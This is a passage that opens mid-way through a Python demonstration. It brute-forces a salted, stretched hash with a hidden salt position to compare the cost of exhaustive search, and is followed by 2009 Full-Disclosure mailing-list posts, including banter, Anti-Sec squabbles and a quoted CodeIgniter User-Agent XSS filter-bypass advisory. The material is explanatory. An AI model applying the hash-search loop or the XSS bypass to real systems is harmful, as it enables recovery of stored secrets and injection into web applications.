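        x = hashlib.sha256(x).digest()
    return x

def enroll(member: str, salt: str, pos: int, rounds: int) -> bytes:
    """Hash the member with the salt spliced in at `pos`; `pos` is not stored."""
    return stretched_hash(member[:pos] + salt + member[pos:], rounds)

def verify(candidate: str, salt: str, stored: bytes, rounds: int):
    """Try every insertion point; return (matched, candidate_tests_used)."""
    tests = 0
    for pos in range(len(candidate) + 1):  # c+1 positions, as in raid's reply
        tests += 1
        if hmac.compare_digest(enroll(candidate, salt, pos, rounds), stored):
            return True, tests
    return False, tests

def brute_force(stored: bytes, salt: str, rounds: int, length: int):
    """Walk the whole decimal domain; return (recovered_member, tests_used)."""
    total = 0
    for digits in product("0123456789", repeat=length):
        candidate = "".join(digits)
        matched, used = verify(candidate, salt, stored, rounds)
        total += used
        if matched:
            return candidate, total
    return None, total

def worst_case_hashes(domain: int, length: int, rounds: int, random_pos: bool) -> int:
    """Primitive hash calls needed to exhaust the domain."""
    positions = length + 1 if random_pos else 1
    return domain * positions * rounds

if __name__ == "__main__":
    # Constructed sample: 3-digit member instead of the thread's 10 digits.
    stored = enroll("427", SALT, pos=2, rounds=5)
    print(brute_force(stored, SALT, rounds=5, length=3))
    for label, rounds, rnd in [("fixed salt, 1 round", 1, False),
                               ("random position, 1 round", 1, True),
                               ("fixed salt, 100000 rounds", 100_000, False)]:
        print(f"{label:28} {worst_case_hashes(10**10, 10, rounds, rnd):.2e}")
```

Hiding the salt position multiplies the exhaustive search by c+1 and no more, while the round count scales it by any factor the login path can afford. The server pays the same multipliers on every legitimate check, which is the DoS cost raid points out.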


[Full-disclosure] IACR

2009-07-31 Thread T Biehn
Anyone been to this?
http://www.iacr.org/conferences/crypto2009/program.html

Worth it?



Re: [Full-disclosure] IACR

2009-07-31 Thread T Biehn
Sorry to spam...
http://www.iacr.org/cryptodb/data/author.php?authorkey=207
So excited to find non-pay papers... Everything on IEEE and ACM reqs
you shell out cash.

On Fri, Jul 31, 2009 at 10:20 AM, T Biehntbi...@gmail.com wrote:
 Anyone been to this?
 http://www.iacr.org/conferences/crypto2009/program.html

 Worth it?




Re: [Full-disclosure] Fredrick Diggle Security - Shameless promotion of services to Matasano

2009-07-27 Thread T Biehn
Travis wonders when Fredrick Diggle has time for his highly trained
and effective security enterprises knowing that he spends most of his
time grooming monkeys and feeding giraffes, which is very difficult to
do when the monkeys decide to start an inter-species war because the
giraffes are blocking their sunlight.

Unless, of course, you've trained some of the brighter monkeys on how
to use metasploit... Looking for investors?

On Mon, Jul 27, 2009 at 3:23 PM, Fredrick Digglefdig...@gmail.com wrote:
 Fredrick Diggle Security has been made aware through its extensive
 network of underground connections and informants that the security
 firm Matasano was recently viciously attacked by a group of hackers.
 Fredrick Diggle would like to personally offer his (and his cronies)
 services in responding to this incident.

 Fredrick Diggle Security recommends that Matasano contract
 professional incident responders (namely Fredrick Diggle et al) to
 perform forensic analysis of the compromised system(s). Only then can
 Matasano be assured that all possible steps have been taken to detect
 and remove any rootkit(s) that may have been placed on this/these
 system(s).

 Fredrick Diggle would also like to offer his services in performing a
 review of Matasano's network architecture. This will help to ensure
 that Matasano will be in the best possible position to prevent and/or
 manage future incidents.



Re: [Full-disclosure] CodeIgniter Global XSS Filtering Bypass Vulnerability

2009-07-27 Thread T Biehn
This is a joke, right?

-Travis

On Mon, Jul 27, 2009 at 11:53 AM, YGN Ethical Hacker Group
(http://yehg.net)li...@yehg.net wrote:
 

 CodeIgniter Global XSS Filtering Bypass Vulnerability

 

 Discovered by:
 Aung Khant, YGN Ethical Hacker Group, Myanmar
 http://yehg.net/ ~ believe in full disclosure

 Product : CodeIgniter  http://www.codeigniter.com
 Product Description : Open-source PHP Framework
 Pen-Tested Version : 1.5.2
 Vulnerability : User-Agent injection
 Risk : Medium
 Threat : XSS, Log File Tampering

 Advisory URL: 
 http://yehg.net/lab/pr0js/view.php/CodeIgniter%20Global%20XSS%20Filtering%20Bypass%20Vulnerability.pdf

 Description:
 $CI->input->user_agent() fails to check the validity of user-agent type.
 It simply extracts from $_SERVER array without checking whether it is
 bad string injection or not. In this case, we can spoof user agent
 string of our browser with our arbitrary commands that can bypass
 stronger CodeIgniter Security class even if
 $config['global_xss_filtering'] = TRUE;. Thus we can execute XSS on
 the fly.



Re: [Full-disclosure] anti-sec: OpenSSH <= 5.2 zero day exploit code - 48 hours until it is publicly released!

2009-07-20 Thread T Biehn
1) Register 'Anti-Sec *' with Free Mail Provider
2) Claims to Full Disclosure
3) 
4) PROFIT.

On Mon, Jul 20, 2009 at 10:16 AM, BlackHawkhawkgot...@gmail.com wrote:
 wasn't anti-sec the one fighting against guys who share exploits with
 the world so script kiddies use them?
 lol, now those guys will kill them selfs!



Re: [Full-disclosure] The Anti-Sec Movement - Clarrifying what it means. Our Targets Remain HackForums.net and Milw0rm.com

2009-07-17 Thread T Biehn
Is there any nudity in this film?
-Travis

On Fri, Jul 17, 2009 at 3:24 AM, Valdis'
Mustachesecuritas.must...@gmail.com wrote:
 To whom it may concern:

 I am frankly at a loss as to why Mr. Wallace has decided to hitch his pasty
 and pockmarked Scottish girth to the recent resurgence of the AntiSec
 movement. One can only conclude that it is an attempt to regain a presence
 on this esteemed list, which as all longtime subscribers know can only end
 in tears.

 I strongly advise all members to take immediate action to ignore this rather
 pitiful attempt to ride the coattails of bona fide Internet saboteurs and
 killfile with extreme prejudice.

 If possible, individuals in or about the greater London metropolitan area
 should take steps to recover Mr. Cartwright from his unfortunate
 incarceration so that he might bring forces to bear on the problem and
 proactively ban applicable Internet Protocol addresses and other suspected
 sock puppets before this list descends into the typical simian
 feces-smearing and autofellatio that have historically followed Mr.
 Wallace's e-ejaculations on this forum.

 I am not amused.

 Your Humble Servant,
 Il-Mustache tal Valdis


Re: [Full-disclosure] Go away Anti-Sec/Security Justice

2009-07-17 Thread T Biehn
dox pull got doxed?
ironic.

On Fri, Jul 17, 2009 at 1:16 PM, anti-anti...@hushmail.com wrote:
 LMH, can you and your Security Justice friends please get laid
 and leave the rest of us alone? This Anti-Sec rebranding is more
 boredom.

 Oh- we know where you work, and who some of you really are. I
 wonder how they'd feel about this stupidity?



Re: [Full-disclosure] n3td3v is posting as ant-sec

2009-07-16 Thread T Biehn
I was about to tarball my directory of XSS 0days for them...

Thanks Ureleet!

/typical fd post

-Travis

On Thu, Jul 16, 2009 at 8:54 AM, Ureleeturel...@gmail.com wrote:
 careful.  n3td3v has found his way back onto the list.  he is now
 posting as ant-sec.  he is hacking and spreading disinformation on
 full-d.

 careful who you talk 2, he has many names.


